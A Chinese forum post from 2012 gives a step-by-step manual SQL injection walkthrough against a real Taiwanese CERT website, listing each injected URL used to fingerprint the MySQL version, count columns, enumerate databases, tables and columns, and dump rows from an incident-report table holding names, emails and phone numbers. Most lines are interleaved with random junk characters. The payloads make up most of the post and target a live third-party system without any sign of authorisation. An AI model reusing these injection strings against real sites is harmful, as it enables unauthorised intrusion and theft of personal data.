1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询* R' S8 d) ]- _. t2 k% Z! ^/ _3 y
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
" e9 I6 S3 ]+ c6 H8 ]) xhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
% |2 F% N, I6 ]% }& l3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
( o. `8 t; i, [1 {0 D; m" A数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
; P, C# z( @4 `# Q2 d# T8 U! ]4.判断有没有写权限
: Z; D' ^! c2 o8 W1 `8 {" x: ~http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
0 T& d: p1 @ Q0 d5 T+ x6 J没办法,手动猜表啦3 g" L) G' I3 t
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1- u* }' `: ?( J8 i3 R8 Q
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
/ u4 g1 [2 j L" N! T( vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--) \; E0 Q# u8 u# y8 ^- y( w
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
Z0 }2 F$ N! w( h/ ^information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb0 H1 L* N9 K5 C* a( `
6.爆表,爆的是twcert库
; f/ f& }9 a5 {. J: z! dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274-- {, `& t4 W7 I5 W% A5 o
爆出如下表# S0 B: T! }, i! I" _+ s
downloadfile,irsys,newsdata,secrpt,secrpt_big5
( p0 d3 Q# h0 c6 w7.爆列名,这次爆的是irsys表
7 p( ]( Z3 l7 n3 l5 vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
, H% K% T" k1 N, Y+ t/ \& A7 y爆出如下列
- _9 h6 n( Z- |9 Qir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status4 S- d$ Y( p/ i
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。0 c" g4 }, f* a8 O. @# j
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
8 Y. n" S* D2 C返回是3,说明每个列里有3个地段0 _ k8 J7 S5 R7 T
9.爆字段内容* y$ e5 S: [9 p F8 A
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
L( B$ Z& y5 D' A- k. ?爆出name列的第一个字段的内容$ i' m: U' E/ i6 m
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--6 L+ g4 S* z0 i% T* _* T9 `
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对